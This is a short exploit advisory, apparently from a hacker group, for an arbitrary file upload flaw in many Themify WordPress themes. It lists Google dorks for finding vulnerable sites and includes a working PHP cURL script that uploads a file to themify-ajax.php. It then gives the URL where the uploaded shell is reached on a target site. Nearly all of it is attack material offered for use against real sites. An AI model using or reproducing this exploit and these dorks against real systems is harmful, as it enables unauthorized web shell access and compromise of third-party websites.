Assalamuallaikum Wr.Wb
- #Author : Jje Incovers
- #Date : 31/03/2014
- #Category : Web Applications
- #Type : TXT, PHP, HTML, HTM, ASP, Etc.
- #Vendor : http://themify.me/
- #Download : http://themify.me/themes
- #Tested : Mozila, Chrome, Opera -> Windows & Linux
- #Vulnerabillity : File Upload
- #Scanning Theme : [ Flatshop, Magazine , Flat Flat , Parallax ,
Bold, Metro , Pinshop , Agency , Slide , Postline , Fullscreen ,
Pinboard , Shopo , Minshop , Notes , ShopDock , PhotoTouch , Basic ,
Responz , Simfo , Grido , Tisa , Suco , Elemin , Folo , Funki , Minblr ,
iTheme2 , Newsy , Wumblr , Rezo , Photobox , Edmin , Koi , Bizco ,
ThemeMin , Wigi , Blogfolio , Sidepane , Bloggie ]
#Dork :
inurl:"/wp-content/themes/Elemin/"
inurl:"/wp-content/themes/Bloggie/"
inurl:"/wp-content/themes/Tisa/"
inurl:"/wp-content/themes/Funki/"
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/FOlo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/Suco/"
inurl:"/wp-content/themes/iThemes2/"
Arbitrary File Upload
Exploit :
/wp-content/themes/select a theme/themify/themify-ajax.php
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php
Script :
<?php
$uploadfile="PriaPolos.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://yourtarget.com/wp-content/themes/select a theme/uploads/your file
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/uploads/PriaPolos.php
Note :
Change theme in the script equate with your dork !!
Credits :
PriaPolos Ft
MrBuckethead | Extreme Crew
